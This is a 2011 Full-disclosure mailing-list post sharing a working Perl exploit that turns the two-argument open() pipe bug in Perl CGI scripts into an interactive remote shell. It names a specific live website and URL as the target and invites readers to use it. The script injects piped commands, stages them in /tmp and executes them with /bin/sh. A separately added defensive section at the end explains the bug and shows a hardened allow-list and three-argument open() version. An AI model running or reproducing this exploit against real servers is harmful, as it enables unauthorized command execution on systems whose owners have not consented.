Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
- From: Marshall Whittaker <marshallwhittaker@xxxxxxxxx>
- Date: Sat, 15 Oct 2011 19:01:50 -0300
Well shit. It did send twice. :( Now I look like a goof, haha.
On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <marshallwhittaker@xxxxxxxxx> wrote:
> This works off the perl pipe read bug, you can just input the first and
> second parts of the web address (with http:// included) and it'll drop you
> at a shell. When using cd you must use the absolute path because I was too
> lazy to do it the correct way. ;-). I know this is pretty easy stuff, it
> works off those vulns that can just be exploited with a web browser, but
> this gives you a shell. So have at it guys & gals! Had to resend because I
> got some message about my attachment being blocked. Not sure if it really
> was, though, I'll send again anyway. Hope this isn't spamming the list. =/
>
> Site:
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
> Usage: ./sublime.pl "http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File"
>
> Should work on most perl cgi scripts that are vulnerable to the | read bug.
> Please note, it's not a "real" shell, but almost everything works, except
> things that won't go in one instance like cd-ing and env vars, etc.
>
> Play nice!
>
> --oxagast
>
> [CODE]
>
> #!/usr/bin/perl
>
> # adaptive cgi shell by oxagast
>
> use LWP::Simple;
> $part1 = @ARGV[0]; $part2 = @ARGV[1];
> print "Making buffer...\n";
> for $bet (100..200) {
> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
> }
> print "Exploiting...\n";
> $id = get("$part1\|id\|$part2");
> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
> $uid = $1;
> print "$uid\n";
> while (0 == 0) {
> print "\$ ";
> $cmd = <STDIN>;
> chomp($cmd);
> if ($cmd =~ m/cd (\/.*)/) {
> $dir = $1;
> }
> if ($cmd eq "cd ..") {
> $dir =~ s/(.*)\/.*/\/\1/;
> }
> if ($cmd eq "pwd") {
> $dirjunk = $dir;
> if ($dirjunk eq "//") {
> $dirjunk = "/";
> }
> }
> $dirjunk = "cd $dir\;$cmd";
> $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
> $cmdhex =~ s/(..)/\\\\x$1/g;
> get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
> @backjunk = split("\n", $backjunk2);
> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
> get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
> @backjunk_split = split("\n", $backjunk_as);
> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
> $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
> $thismanylines = $1 - 1;
> for $junknum (0..scalar(@backjunk_split)) {
> for $fuzz (10..100+$thismanylines) {
> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
> $middle = $1;
> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
> @backjunk_split[$junknum] =~ s/$1//;
> @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
> @backjunk_split[$junknum] =~ s/$1//;
> print "$backjunk_split[$junknum]\n";
> }
> }
> }
> }
>
> [/CODE]
>
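The bug the quoted tool relies on is Perl's two-argument open(), which lets the data choose the mode: a "filename" ending in "|" is run as a command. Below is an added example (not code from the post or from the site it names) showing that CGI pattern next to a hardened version; the $BASE directory, the function names and all inputs except the stats/1966vinmatrix.htm name from the original URL are assumptions.

```perl
#!/usr/bin/perl
# Added example: the two-arg open() pattern behind the "| read bug" and a
# hardened replacement. $BASE and the function names are assumptions.
use strict;
use warnings;
use File::Spec;

my $BASE = '/var/www/stats';   # assumed directory that holds the stat files

# VULNERABLE (shown for contrast, never call with untrusted input): with the
# two-argument form the string itself decides the mode, so a name such as
# "id|" is handed to the shell and its output comes back as the "file".
sub read_stats_unsafe {
    my ($filename) = @_;
    open(my $fh, $filename) or die "open: $!";   # mode comes from the data
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Allow-list check: one or more path segments of [A-Za-z0-9._-], each
# starting with a letter, digit, "_" or "-", so "..", ".hidden", a leading
# "/" and every shell metacharacter (including "|") are rejected.
sub valid_stats_name {
    my ($filename) = @_;
    return 0 unless defined $filename;
    return $filename =~ m{\A[A-Za-z0-9_-][A-Za-z0-9._-]*(?:/[A-Za-z0-9_-][A-Za-z0-9._-]*)*\z} ? 1 : 0;
}

# HARDENED: validate first, anchor under $BASE, and use three-argument open
# so the mode is fixed to "<" and the name can only ever be a path.
sub read_stats_safe {
    my ($filename) = @_;
    return (undef, 'bad filename') unless valid_stats_name($filename);
    my $path = File::Spec->catfile($BASE, $filename);
    open(my $fh, '<', $path) or return (undef, "open: $!");
    local $/;
    my $body = <$fh>;
    close $fh;
    return ($body, undef);
}

# Constructed inputs: the legitimate name from the original URL, then the
# shapes a validator must reject before open() ever sees them.
for my $name ('stats/1966vinmatrix.htm', '|id|', 'id|', '../../etc/passwd', '/etc/passwd') {
    printf "%-25s -> %s\n", $name, valid_stats_name($name) ? 'accepted' : 'rejected';
}
```

Only the first constructed name is accepted; the other four are refused by the allow-list before any open() call, which is the check the vulnerable script lacks.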
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/